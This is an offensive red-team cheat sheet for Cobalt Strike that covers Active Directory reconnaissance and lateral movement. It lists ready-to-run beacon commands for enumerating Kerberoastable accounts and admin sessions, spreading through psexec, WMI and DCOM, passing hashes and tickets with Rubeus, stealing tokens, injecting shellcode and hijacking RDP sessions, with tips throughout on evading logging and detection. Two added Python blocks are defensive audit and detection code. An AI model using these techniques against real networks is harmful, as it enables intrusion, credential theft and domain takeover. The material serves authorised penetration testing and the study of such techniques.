Domain Reconnaissance & Lateral Movement
Domain Reconnaissance
PowerView Enumeration
Usage: Comprehensive Active Directory enumeration using PowerView.
# Import PowerView (use latest SharpView when possible for better OPSEC)
beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
# Alternative: Use SharpView for .NET execution (bypasses PowerShell logging)
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain
# ===== DOMAIN ENUMERATION =====
# Get current domain information
beacon> powerpick Get-Domain
beacon> powerpick Get-Domain -Domain corp.local
# Get domain SID
beacon> powerpick Get-DomainSID
# Get domain controllers
beacon> powerpick Get-DomainController | select Forest,Name,OSVersion,IPAddress | fl
# Get forest information
beacon> powerpick Get-ForestDomain
beacon> powerpick Get-ForestDomain -Forest corp.local
# Get domain password policy (SystemAccess section of the Default Domain Policy)
beacon> powerpick Get-DomainPolicyData | select -expand SystemAccess
# Get domain Kerberos policy (ticket lifetimes, clock skew)
beacon> powerpick Get-DomainPolicyData | select -expand KerberosPolicy
# Same password policy via the older Get-DomainPolicy function name
beacon> powerpick (Get-DomainPolicy)."SystemAccess"
# ===== USER ENUMERATION =====
# Get all domain users
beacon> powerpick Get-DomainUser | select samaccountname,description | ft -AutoSize
# Get specific user details
beacon> powerpick Get-DomainUser -Identity jdoe -Properties DisplayName,MemberOf,ServicePrincipalName,LastLogon | fl
# Find users with SPNs (Kerberoastable)
beacon> powerpick Get-DomainUser -SPN | select samaccountname,serviceprincipalname | fl
# Find users without Kerberos pre-authentication (ASREPRoastable)
beacon> powerpick Get-DomainUser -PreauthNotRequired | select samaccountname,distinguishedname | fl
# Find users trusted to authenticate for delegation (constrained delegation with protocol transition)
beacon> powerpick Get-DomainUser -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | fl
# Find users with any constrained delegation targets (msDS-AllowedToDelegateTo populated)
beacon> powerpick Get-DomainUser | ? {$_.msds-allowedtodelegateto} | select samaccountname,msds-allowedtodelegateto
# Find admin count users (protected by AdminSDHolder)
beacon> powerpick Get-DomainUser -AdminCount | select samaccountname,admincount | ft -AutoSize
# Find users with passwords not required
beacon> powerpick Get-DomainUser -PasswordNotRequired | select samaccountname
# Find users with password never expires
beacon> powerpick Get-DomainUser -PasswordNeverExpires | select samaccountname
# Find users whose accounts may be delegated (not marked "sensitive and cannot be delegated")
beacon> powerpick Get-DomainUser -AllowDelegation | select samaccountname
# ===== COMPUTER ENUMERATION =====
# Get all domain computers
beacon> powerpick Get-DomainComputer | select dnshostname,operatingsystem | ft -AutoSize
# Get computers sorted by OS
beacon> powerpick Get-DomainComputer -Properties DnsHostName,OperatingSystem | sort OperatingSystem | ft -AutoSize
# Find computers with unconstrained delegation
beacon> powerpick Get-DomainComputer -Unconstrained | select dnshostname,samaccountname | ft -AutoSize
# Find computers with constrained delegation
beacon> powerpick Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto | fl
# Get domain controllers by hostname heuristic (Get-DomainController above is the authoritative source)
beacon> powerpick Get-DomainComputer -Properties DnsHostName,OperatingSystem | ? {$_.OperatingSystem -like "*Server*" -and $_.DnsHostName -like "*DC*"}
# Find computers by operating system
beacon> powerpick Get-DomainComputer -OperatingSystem "*Server 2019*" | select dnshostname
# ===== GROUP ENUMERATION =====
# Get all domain groups
beacon> powerpick Get-DomainGroup | select samaccountname,description | ft -AutoSize
# Find admin groups
beacon> powerpick Get-DomainGroup | ? {$_.Name -like "*Admin*"} | select samaccountname,member | fl
# Get specific group members
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
# Get group members recursively (includes nested groups)
beacon> powerpick Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberDistinguishedName
# Get user's group memberships
beacon> powerpick Get-DomainGroup -UserName jdoe | select samaccountname
# Get members of the domain's built-in Administrators group
beacon> powerpick Get-DomainGroupMember -Identity "Administrators" | select MemberDistinguishedName
# ===== ORGANIZATIONAL UNIT (OU) ENUMERATION =====
# Get all OUs
beacon> powerpick Get-DomainOU | select name,distinguishedname | ft -AutoSize
# Get computers in specific OU
beacon> powerpick Get-DomainComputer -SearchBase "OU=Workstations,DC=corp,DC=local" | select dnshostname
# Get OUs with specific GPO linked
beacon> powerpick Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedname
# ===== GROUP POLICY ENUMERATION =====
# Get all GPOs
beacon> powerpick Get-DomainGPO | select displayname,gpcfilesyspath | ft -AutoSize
# Get GPOs sorted by name
beacon> powerpick Get-DomainGPO -Properties DisplayName | sort DisplayName
# Find GPO by name
beacon> powerpick Get-DomainGPO | ? {$_.DisplayName -like "*LAPS*"}
# Get local group mappings from GPOs
beacon> powerpick Get-DomainGPOLocalGroup | select GPODisplayName,GroupName
# Find where specific user/group has admin rights via GPO
beacon> powerpick Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName,GPODisplayName,ContainerName,ComputerName | fl
# Get GPO applied to specific computer
beacon> powerpick Get-DomainGPO -ComputerIdentity "WS01" | select displayname
# ===== TRUST ENUMERATION =====
# Get domain trusts
beacon> powerpick Get-DomainTrust
beacon> powerpick Get-DomainTrust -Domain corp.local
# Get forest trusts
beacon> powerpick Get-ForestTrust
beacon> powerpick Get-ForestTrust -Forest corp.local
# Get foreign users in current domain
beacon> powerpick Get-DomainForeignUser | select samaccountname,distinguishedname
# Get foreign group members
beacon> powerpick Get-DomainForeignGroupMember | select GroupDomain,GroupName,MemberName
# ===== ACCESS ENUMERATION =====
# Find computers where current user has local admin
beacon> powerpick Find-LocalAdminAccess
# Check local admin access on specific computer
beacon> powerpick Invoke-CheckLocalAdminAccess -ComputerName dc01.corp.local
# Find where domain admin sessions exist (hunt for admins)
beacon> powerpick Invoke-UserHunter -GroupName "Domain Admins"
# Find where specific user is logged in
beacon> powerpick Invoke-UserHunter -UserName "admin-jdoe"
# Check PSRemoting access
beacon> powerpick Find-PSRemotingLocalAdminAccess -ComputerName srv01.corp.local
# Check WMI access
beacon> powerpick Find-WMILocalAdminAccess -ComputerName srv01.corp.local
# Get sessions on remote computer
beacon> powerpick Get-NetSession -ComputerName dc01.corp.local
# Get logged-on users on remote computer
beacon> powerpick Get-NetLoggedon -ComputerName srv01.corp.local
# ===== ACL ENUMERATION =====
# Find interesting ACLs (GenericAll, WriteDacl, etc.)
beacon> powerpick Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}
# Find ACLs for specific user
beacon> powerpick Get-DomainObjectAcl -Identity jdoe -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl"}
# Find who can modify specific group
beacon> powerpick Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"}
# Find computers with LAPS passwords readable by current user
beacon> powerpick Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty"}
# ===== SHARE ENUMERATION =====
# Find all accessible shares
beacon> powerpick Invoke-ShareFinder
# Find shares on specific computer
beacon> powerpick Invoke-ShareFinder -ComputerName srv01.corp.local
# Find readable shares
beacon> powerpick Find-DomainShare -CheckShareAccess
# Find interesting files on shares
beacon> powerpick Find-InterestingDomainShareFile -Include *.doc*,*.xls*,*.csv,*.ppt*,*.txt
# Search for specific keywords in share files
beacon> powerpick Find-InterestingDomainShareFile -Include *.txt,*.doc* -SearchTerms password,credential,secret
# OPSEC Considerations:
# - PowerView queries generate LDAP traffic (Event ID 4662 on DCs)
# - Use -Server parameter to query specific DC (reduces broadcast queries)
# - Avoid Invoke-UserHunter in production (very noisy, queries all computers)
# - Use SharpView (execute-assembly) to avoid PowerShell logging
# - Space out enumeration commands to avoid detection
Alternative Enumeration Tools
SharpView (Preferred for OPSEC)
Usage: .NET implementation of PowerView, bypasses PowerShell logging.
# Basic domain enumeration
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain
# Get domain users
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainUser
# Get domain computers
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainComputer
# Get domain groups
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainGroup
# Get group members
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-DomainGroupMember -Identity "Domain Admins"
# Find local admin access
beacon> execute-assembly C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Find-LocalAdminAccess
# OPSEC: SharpView generates less telemetry than PowerView
# No PowerShell ScriptBlock logging (Event ID 4104)
ADSearch (Lightweight LDAP Queries)
Usage: Efficient LDAP search tool for quick AD enumeration.
# Search for all users
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user"
# Search for admin groups
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admin*))"
# Get specific group members
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=group)(cn=Domain Admins))" --attributes cn,member
# Find Kerberoastable users (SPN set)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Find ASREPRoastable users (pre-auth not required)
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
# Find computers with unconstrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
# Find computers with constrained delegation
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
# Find users with AdminCount=1
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(adminCount=1))" --attributes samaccountname
# Search in specific domain
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=user" --domain corp.local
# Use --json flag for formatted output
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "objectCategory=computer" --attributes dnshostname,operatingsystem --json
# OPSEC: ADSearch is very fast and generates minimal LDAP queries
# Ideal for quick checks without PowerShell
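The ADSearch filters above encode account flags as a userAccountControl bitmask. The following added Python (not ADSearch's or PowerView's code) applies the same matching-rule test to a constructed directory export and turns each hit into a hardening item, so a defender can find these exposures before anyone enumerates them. The export's field names, the sample accounts and the finding text are assumptions.

```python
"""Decode userAccountControl the way the ADSearch filters above do, then audit it.

Added example, not part of ADSearch or PowerView. The page's filter
(userAccountControl:1.2.840.113556.1.4.803:=4194304) uses the bitwise-AND
matching rule: it matches when every bit of the mask (here DONT_REQ_PREAUTH) is set.
"""
import re
from typing import Dict, List

# Documented userAccountControl bit values (the subset relevant to this page)
UAC = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080,         # reversible encryption
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # 524288: unconstrained delegation
    "NOT_DELEGATED": 0x100000,                    # "account is sensitive and cannot be delegated"
    "DONT_REQ_PREAUTH": 0x400000,                 # 4194304: AS-REP roastable
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}
BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND: all mask bits set
BIT_OR = "1.2.840.113556.1.4.804"   # LDAP_MATCHING_RULE_BIT_OR: any mask bit set
FILTER_RE = re.compile(r"\(userAccountControl:([\d.]+):=(\d+)\)")


def matching_rule(rule: str, uac: int, mask: int) -> bool:
    """Evaluate an LDAP extensible-match rule on an integer attribute."""
    if rule == BIT_AND:
        return (uac & mask) == mask
    if rule == BIT_OR:
        return (uac & mask) != 0
    raise ValueError(f"unsupported matching rule {rule}")


def match_uac_filter(acct: Dict, ldap_filter: str) -> bool:
    """Apply one userAccountControl clause, as written on this page, to a record."""
    m = FILTER_RE.fullmatch(ldap_filter)
    if not m:
        raise ValueError("expected (userAccountControl:<rule-oid>:=<mask>)")
    return matching_rule(m.group(1), int(acct["userAccountControl"]), int(m.group(2)))


def decode_uac(uac: int) -> List[str]:
    """Names of all set flags, for readable reports."""
    return [name for name, bit in UAC.items() if uac & bit]


def audit_account(acct: Dict) -> List[str]:
    """Hardening findings for one enabled account; disabled accounts are skipped."""
    uac = int(acct["userAccountControl"])
    findings: List[str] = []
    if uac & UAC["ACCOUNTDISABLE"]:
        return findings
    is_user = bool(uac & UAC["NORMAL_ACCOUNT"])
    is_dc = bool(uac & UAC["SERVER_TRUST_ACCOUNT"])
    if matching_rule(BIT_AND, uac, UAC["DONT_REQ_PREAUTH"]):
        findings.append("DONT_REQ_PREAUTH: AS-REP roastable, re-enable Kerberos pre-authentication")
    if matching_rule(BIT_AND, uac, UAC["TRUSTED_FOR_DELEGATION"]) and not is_dc:
        findings.append("unconstrained delegation on a non-DC: move to constrained or resource-based delegation")
    if uac & UAC["TRUSTED_TO_AUTH_FOR_DELEGATION"] or acct.get("msDS-AllowedToDelegateTo"):
        findings.append("constrained delegation: review allowed target SPNs and protocol transition")
    if is_user and acct.get("servicePrincipalName"):
        findings.append("user account with SPN: Kerberoastable, prefer a gMSA or a long random password")
    if uac & UAC["PASSWD_NOTREQD"]:
        findings.append("PASSWD_NOTREQD: an empty password is permitted")
    if uac & UAC["ENCRYPTED_TEXT_PWD_ALLOWED"]:
        findings.append("reversible encryption: cleartext-equivalent password stored in the directory")
    if int(acct.get("adminCount", 0)) == 1 and not (uac & UAC["NOT_DELEGATED"]):
        findings.append("privileged account not marked sensitive: set NOT_DELEGATED or use Protected Users")
    return findings


def audit_export(records: List[Dict]) -> Dict[str, List[str]]:
    """Map sAMAccountName -> findings, omitting accounts with nothing to report."""
    report = {}
    for acct in records:
        found = audit_account(acct)
        if found:
            report[acct["sAMAccountName"]] = found
    return report


# Constructed sample export (not real directory data)
SAMPLE_EXPORT = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200, "adminCount": 0,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x400200, "adminCount": 0},
    {"sAMAccountName": "admin-jdoe", "userAccountControl": 0x200, "adminCount": 1},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "adminCount": 0},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000, "adminCount": 0},
    {"sAMAccountName": "old_user", "userAccountControl": 0x400202, "adminCount": 0},
]

if __name__ == "__main__":
    report = audit_export(SAMPLE_EXPORT)
    for acct in SAMPLE_EXPORT:
        name = acct["sAMAccountName"]
        if name in report:
            print(name, decode_uac(acct["userAccountControl"]))
            for item in report[name]:
                print("  -", item)
```

The DC01$ record carries TRUSTED_FOR_DELEGATION but is not reported, because domain controllers legitimately hold unconstrained delegation; WEB01$ with the same bit is.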
BloodHound Data Collection
Usage: Collect AD relationships for graph-based attack path analysis.
# SharpHound (latest collector)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c All --zipfilename corp_bloodhound.zip
# Collection methods:
# -c All : Collect everything (default)
# -c Session : Collect session data only
# -c LoggedOn : Collect logged-on users
# -c Group : Collect group memberships
# -c LocalAdmin : Collect local admin rights
# -c GPOLocalGroup : Collect GPO-based admin rights
# -c ACL : Collect ACLs
# -c Container : Collect OU structure
# -c ObjectProps : Collect object properties
# -c SPNTargets : Collect SPN targets
# Targeted collection (faster, less noisy)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c Session,Group,LocalAdmin --zipfilename corp_targeted.zip
# Stealth collection (no session enumeration)
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c DCOnly --zipfilename corp_dc_only.zip
# Exclude domain controllers from enumeration
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -c All --excludedomaincontrollers --zipfilename corp_no_dc.zip
# Collect from specific domain
beacon> execute-assembly C:\Tools\SharpHound\SharpHound.exe -d corp.local -c All
# Download collection
beacon> download C:\Users\jdoe\Desktop\corp_bloodhound.zip
# Alternative: AzureHound for Azure AD/Entra ID
beacon> execute-assembly C:\Tools\AzureHound\AzureHound.exe -r All
# OPSEC Considerations:
# - SharpHound creates network traffic to ALL domain computers
# - Session collection (Get-NetSession) is very noisy
# - DCOnly method queries only DC (stealthiest)
# - Avoid running during business hours on monitored networks
# - BloodHound data expires quickly (sessions change)
StandIn (Situational Awareness)
Usage: Lightweight AD enumeration and manipulation tool.
# Get domain information
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object domain
# Get forest information
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object forest
# Enumerate users
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object user
# Enumerate computers
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object computer
# Enumerate groups
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --object group
# Get group members
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --group "Domain Admins"
# ASREP Roast
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --asrep
# Kerberoast
beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --kerberoast
Lateral Movement
Jump Methods (Built-in Cobalt Strike)
Usage: Move laterally using various execution methods.
# ===== SMB-BASED METHODS =====
# PSExec (traditional, requires SMB + Admin$)
beacon> jump psexec64 srv01.corp.local smb_listener
# PSExec with PowerShell (alternative)
beacon> jump psexec_psh srv01.corp.local http_listener
# OPSEC: PSExec creates service and writes to ADMIN$ share
# Generates: Event ID 5145 (share access), 7045 (service creation)
# ===== WINRM-BASED METHODS =====
# WinRM (requires WinRM enabled, port 5985/5986)
beacon> jump winrm64 srv01.corp.local http_listener
# OPSEC: WinRM is common in modern environments
# Generates: Event ID 4624 (logon), 4688 (process creation)
# ===== WMI-BASED METHODS =====
# WMI (stealthier, no service creation)
beacon> remote-exec wmi srv01.corp.local "C:\Windows\beacon.exe"
# OPSEC: WMI is native and common for admin tasks
# Generates: Event ID 4688 (wmiprvse.exe spawns child process)
# ===== AVAILABLE LISTENERS =====
# Before using jump, ensure appropriate listener exists:
# - SMB listener: For peer-to-peer communication over named pipes
# - TCP listener: For direct TCP connections
# - HTTP/HTTPS listener: For standard callback to team server
# CRITICAL: Always use stageless payloads for jump commands
# Staging over network is noisy and unreliable
Remote Execution Methods
Usage: Execute commands/payloads on remote systems without creating beacon.
# PSExec remote execution
beacon> remote-exec psexec srv01.corp.local "powershell -NoP -W Hidden -Enc <BASE64>"
# WinRM remote execution
beacon> remote-exec winrm srv01.corp.local "powershell -NoP -W Hidden -Enc <BASE64>"
# WMI remote execution
beacon> remote-exec wmi srv01.corp.local "C:\Windows\System32\cmd.exe /c whoami > C:\Windows\Temp\output.txt"
# OPSEC: Use remote-exec for reconnaissance, jump for persistent access
# remote-exec doesn't create beacon, just executes command
Manual Lateral Movement (Step-by-Step)
PSExec-style Manual Execution
Usage: Manual PSExec-style lateral movement for better control.
# 1. Upload payload to target
beacon> cd \\srv01.corp.local\ADMIN$
beacon> upload C:\Payloads\smb_x64.svc.exe
# 2. Create service on target
beacon> shell sc \\srv01.corp.local create BeaconSvc binPath= "C:\Windows\smb_x64.svc.exe" start= auto
beacon> shell sc \\srv01.corp.local start BeaconSvc
# 3. Connect to SMB beacon
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# 4. Cleanup (after establishing connection)
beacon> shell sc \\srv01.corp.local stop BeaconSvc
beacon> shell sc \\srv01.corp.local delete BeaconSvc
beacon> shell del \\srv01.corp.local\ADMIN$\smb_x64.svc.exe
WMI Manual Lateral Movement
Usage: Step-by-step WMI-based lateral movement.
# 1. Upload payload to target
beacon> cd \\srv01.corp.local\C$\ProgramData
beacon> upload C:\Payloads\smb_x64.exe
beacon> mv smb_x64.exe WindowsUpdate.exe
# 2. Execute via WMI
beacon> remote-exec wmi srv01.corp.local "C:\ProgramData\WindowsUpdate.exe"
# Alternative: PowerShell WMI execution
beacon> powerpick Invoke-WmiMethod -ComputerName srv01.corp.local -Class Win32_Process -Name Create -ArgumentList "C:\ProgramData\WindowsUpdate.exe"
# 3. Connect to SMB beacon (if using SMB payload)
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# 4. Cleanup
beacon> shell del \\srv01.corp.local\C$\ProgramData\WindowsUpdate.exe
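The event IDs listed under Jump Methods and the two manual sequences above are also what a defender has to work with. The following added Python (not part of Cobalt Strike or any tool on this page) correlates them over constructed event records: a 5145 write to ADMIN$ followed within a minute by a 7045 install of the same file, and a 4688 whose parent is the WMI provider host or the WinRM plug-in host. Field names, hostnames and timestamps are constructed, and wsmprovhost.exe as the WinRM parent process is an assumption beyond what the page states.

```python
"""Detect the lateral-movement telemetry described above from constructed event records.

Added detection example, not part of Cobalt Strike or any tool on this page.
Rule 1: 5145 write to ADMIN$ followed by 7045 installing the dropped file (PSExec-style).
Rule 2: 4688 process creation whose parent hosts remote execution (WMI or WinRM).
"""
from datetime import datetime, timedelta
import ntpath  # parses backslash paths regardless of the host OS

WINDOW = timedelta(seconds=60)
# Parent processes that host remotely triggered execution (WMI, WinRM; assumption)
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "wsmprovhost.exe"}
FILE_WRITE_DATA = 0x2  # AccessMask bit in 5145 meaning WriteData/AddFile


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _base(path):
    return ntpath.basename(path).lower()


def detect_service_drop(events):
    """5145 write to ADMIN$ followed within WINDOW by 7045 installing that file."""
    writes = [
        e for e in events
        if e["id"] == 5145
        and e["ShareName"].upper().endswith("ADMIN$")
        and int(e["AccessMask"], 16) & FILE_WRITE_DATA
    ]
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        for w in writes:
            same_host = w["host"] == svc["host"]
            same_file = _base(w["RelativeTargetName"]) == _base(svc["ImagePath"])
            delta = _ts(svc) - _ts(w)
            if same_host and same_file and timedelta(0) <= delta <= WINDOW:
                alerts.append({
                    "rule": "psexec_style_service_install",
                    "host": svc["host"],
                    "source_ip": w["IpAddress"],
                    "user": w["SubjectUserName"],
                    "service": svc["ServiceName"],
                    "image": svc["ImagePath"],
                })
    return alerts


def detect_remote_exec_child(events):
    """4688 where the parent is the WMI provider host or the WinRM plug-in host."""
    return [
        {
            "rule": "remote_exec_child",
            "host": e["host"],
            "parent": e["ParentProcessName"],
            "process": e["NewProcessName"],
        }
        for e in events
        if e["id"] == 4688 and _base(e["ParentProcessName"]) in REMOTE_EXEC_PARENTS
    ]


def run_detections(events):
    """Run both rules over a list of event records and return all alerts."""
    events = sorted(events, key=_ts)
    return detect_service_drop(events) + detect_remote_exec_child(events)


# Constructed sample events (field names follow the Windows Security/System logs)
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2024-05-01T09:00:00", "host": "srv01",
     "LogonType": "3", "TargetUserName": "jdoe", "IpAddress": "10.10.10.5"},
    {"id": 5145, "time": "2024-05-01T09:00:02", "host": "srv01",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "smb_x64.svc.exe",
     "AccessMask": "0x2", "IpAddress": "10.10.10.5", "SubjectUserName": "jdoe"},
    {"id": 7045, "time": "2024-05-01T09:00:05", "host": "srv01",
     "ServiceName": "BeaconSvc", "ImagePath": "C:\\Windows\\smb_x64.svc.exe"},
    {"id": 4688, "time": "2024-05-01T09:10:00", "host": "srv01",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\ProgramData\\WindowsUpdate.exe"},
    {"id": 4688, "time": "2024-05-01T09:11:00", "host": "srv02",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe"},
    # Routine admin write to ADMIN$ with no service install: must not alert
    {"id": 5145, "time": "2024-05-01T10:00:00", "host": "srv02",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "Temp\\report.txt",
     "AccessMask": "0x2", "IpAddress": "10.10.10.9", "SubjectUserName": "backup"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```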
Advanced Lateral Movement Techniques
DCOM Execution (Stealthier)
Usage: Use DCOM for lateral movement without writing files to disk.
# Import Invoke-DCOM script
beacon> powershell-import C:\Tools\Invoke-DCOM.ps1
# Method 1: MMC20.Application (most reliable)
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method MMC20.Application -Command "C:\Windows\smb_x64.exe"
# Method 2: ShellWindows (alternative)
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method ShellWindows -Command "C:\Windows\smb_x64.exe"
# Method 3: ShellBrowserWindow
beacon> powerpick Invoke-DCOM -ComputerName srv01.corp.local -Method ShellBrowserWindow -Command "C:\Windows\smb_x64.exe"
# Connect to beacon (if using SMB payload)
beacon> link srv01.corp.local TSVCPIPE-agent_007
# OPSEC: DCOM doesn't create services or write obvious files
# Generates fewer suspicious events than PSExec
# Commonly used by legitimate admin tools
Remote .NET Assembly Execution
Usage: Execute .NET assemblies remotely without file transfer.
# Execute Seatbelt on remote computer
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe OSInfo -ComputerName=srv01
# Execute Rubeus remotely
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage -ComputerName=srv01
# OPSEC: Assembly loaded in memory, no disk writes
# Requires appropriate network access and privileges
Pass-the-Hash Lateral Movement
Usage: Move laterally using NTLM hashes.
# Use pth command for pass-the-hash
beacon> pth CORP\jdoe 8846f7eaee8fb117ad06bdd830b7586c
# Verify access after PTH
beacon> shell dir \\srv01.corp.local\C$
# Use with jump command
beacon> jump psexec64 srv01.corp.local smb_listener
# Alternative: Use make_token with fake password (NTLM used automatically)
beacon> make_token CORP\jdoe FakePassword123
beacon> shell dir \\srv01.corp.local\C$
# Revert to original token
beacon> rev2self
# OPSEC: NTLM authentication still common in enterprises
# Less suspicious than unusual authentication methods
Overpass-the-Hash (Pass-the-Key)
Usage: Request TGT using NTLM/AES hash, then use Kerberos for lateral movement.
# Request TGT using NTLM hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jdoe /rc4:8846f7eaee8fb117ad06bdd830b7586c /domain:corp.local /nowrap
# Better OPSEC: Use AES256 key
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jdoe /aes256:<aes256_key> /domain:corp.local /opsec /nowrap
# Create sacrificial process and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:corp.local /username:jdoe /password:FakePass /ticket:<base64_ticket>
# Steal token from sacrificial process
beacon> steal_token <pid>
# Now use jump with Kerberos ticket
beacon> jump psexec64 srv01.corp.local smb_listener
# Cleanup
beacon> rev2self
Token Impersonation & Process Injection
Usage: Steal tokens or inject into processes for lateral movement.
# List processes with tokens
beacon> ps
# Steal token from specific process (e.g., user logged on remotely)
beacon> steal_token 4464
# Verify impersonation
beacon> getuid
# Use stolen token for access
beacon> shell dir \\srv01.corp.local\C$
# Inject beacon into remote process
beacon> inject 4464 x64 tcp-local
# Return to original token
beacon> rev2self
# Shellcode injection into process
beacon> shinject <pid> x64 C:\Payloads\shellcode.bin
# OPSEC: Token theft requires SeDebugPrivilege
# Injecting into SYSTEM process elevates privileges
RDP Hijacking (Session Hijacking)
Usage: Hijack existing RDP sessions for lateral movement.
# List RDP sessions
beacon> shell query user
# Hijack session (requires SYSTEM privileges)
beacon> shell tscon <session_id> /dest:<current_session>
# Alternative: Use Mimikatz for RDP session hijacking
beacon> mimikatz !ts::sessions
beacon> mimikatz !ts::remote /id:<session_id>
# OPSEC: Session hijacking is very stealthy
# No new logon event generated (user already logged in)
# Requires SYSTEM privileges on target
PowerShell Remoting (PSRemoting)
Usage: Use PowerShell remoting for lateral movement.
# Test if PSRemoting is enabled
beacon> powerpick Test-WSMan -ComputerName srv01.corp.local
# Enter remote session
beacon> powerpick Enter-PSSession -ComputerName srv01.corp.local
# Execute command on remote system
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {whoami}
# Execute script on remote system
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -FilePath C:\Scripts\payload.ps1
# Execute on multiple computers
